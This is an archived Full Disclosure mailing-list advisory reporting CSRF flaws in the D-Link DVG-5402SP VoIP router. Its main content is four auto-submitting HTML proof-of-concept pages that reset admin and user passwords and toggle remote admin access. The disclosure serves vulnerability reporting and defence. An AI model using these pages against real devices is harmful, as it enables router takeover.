[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CSRF vulnerabilities in D-Link DVG-5402SP
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CSRF vulnerabilities in D-Link DVG-5402SP
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Mon, 31 Jul 2017 23:55:20 +0300
Hello list!
There are multiple Cross-Site Request Forgery vulnerabilities in D-Link
DVG-5402SP VoIP Router.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other
versions also must be vulnerable.
Since December 2014 the developers didn't answer me concerning
vulnerabilities in DVG-5402SP and other D-Link devices, which I informed
them about. Concerning these holes I informed them at 28.03.2016.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Change admin's password:
D-Link DVG-5402SP CSRF-1.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost"; method="post">
<input type="hidden" name="K13" value="1">
<input type="hidden" name="ot_confirm_password_K13" value="1">
</form>
</body>
</html>
Change user's password:
D-Link DVG-5402SP CSRF-2.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost"; method="post">
<input type="hidden" name="K374" value="1">
<input type="hidden" name="ot_confirm_password_K374" value="1">
</form>
</body>
</html>
Turn off remote access to web admin panel:
D-Link DVG-5402SP CSRF-3.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost"; method="post">
<input type="hidden" name="K626" value="0">
</form>
</body>
</html>
Turn on remote access to web admin panel:
D-Link DVG-5402SP CSRF-4.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost"; method="post">
<input type="hidden" name="K626" value="1">
</form>
</body>
</html>
Similarly can be changed any settings in admin panel, such as turn off
telnet access.
Cross-Site Request Forgery (WASC-09):
After the change, the password must be saved and the device restarted by
separate GET request:
http://site/ConfigBackupForm.asp
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7597/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/